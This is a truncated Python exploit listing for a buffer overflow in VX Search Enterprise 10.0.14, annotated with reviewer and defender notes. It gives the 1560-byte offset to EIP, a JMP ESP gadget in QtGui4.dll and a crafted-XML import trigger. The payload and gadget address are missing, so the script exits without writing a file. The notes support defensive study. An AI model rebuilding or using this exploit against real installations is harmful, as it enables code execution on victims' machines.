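#!/usr/bin/python
# Exploit Title     : VX Search Enterprise v10.0.14 - Buffer Overflow
# Discovery by      : Anurag Srivastava
# Email             : anurag.srivastava@pyramidcyber.com
# Website           : www.pyramidcyber.com
# Discovery Date    : 25/08/2017
# Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.0.14.exe
# Tested Version    : 10.0.14
# Tested on OS      : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open
#                     VX Search Enterprise software, right click and click on
#                     import command. Select pyramid.xml file.
#
# Reviewer notes
# --------------
# What the listing shows:
#   * The trigger is a crafted XML file loaded through the application's
#     "import command" dialog, so it needs a local user to open the file.
#   * The filler length below is labelled "offset to eip", so input longer
#     than 1560 bytes reaches the saved instruction pointer.
#   * Control is redirected through a JMP ESP instruction in QtGui4.dll.
#
# What that implies for defenders (inferred, not shown on the page):
#   * A hard-coded gadget address only works if QtGui4.dll loads at a
#     predictable base, which suggests the module is not ASLR-enabled.
#   * Jumping to ESP only works if the stack is executable for this process,
#     which suggests DEP is not enforced for it.
#   * Forcing DEP and mandatory ASLR for the application through OS exploit
#     protection settings should break both assumptions - confirm by testing.
#   * Treat import files from untrusted sources as hostile input.
#   * Alert on crashes of the application or on child processes it spawns.
#   * Apply a vendor build that bounds-checks the import parser if one exists.
#
# Integrity of this copy:
#   The page was collapsed onto one line and part of it was lost. Everything
#   between the opening quote of the struct.pack() format string and the final
#   open() call is missing: the gadget address, the rest of the payload, and
#   the statement that assigned `file`. None of it is reconstructed here.

import os
import struct

# offset to eip: number of filler bytes before the saved return address.
junk = "A" * (1560)

# JMP ESP (QtGui4.dll)
# The original statement is truncated in this copy and is kept only as a
# comment, because it is not valid Python as it stands:
#     jmp1 = struct.pack(''

# The assignment of `file` (the XML document wrapping the payload) is absent
# from this copy of the listing.
file = None

if file is None:
    # Fail before touching the filesystem. The original order would create or
    # truncate pyramid.xml and then crash on the undefined name.
    raise SystemExit(
        "pyramid.xml not written: the payload assembly is missing from this "
        "copy of the listing"
    )

# A context manager closes the handle even if the write fails.
with open('pyramid.xml', 'w') as f:
    f.write(file)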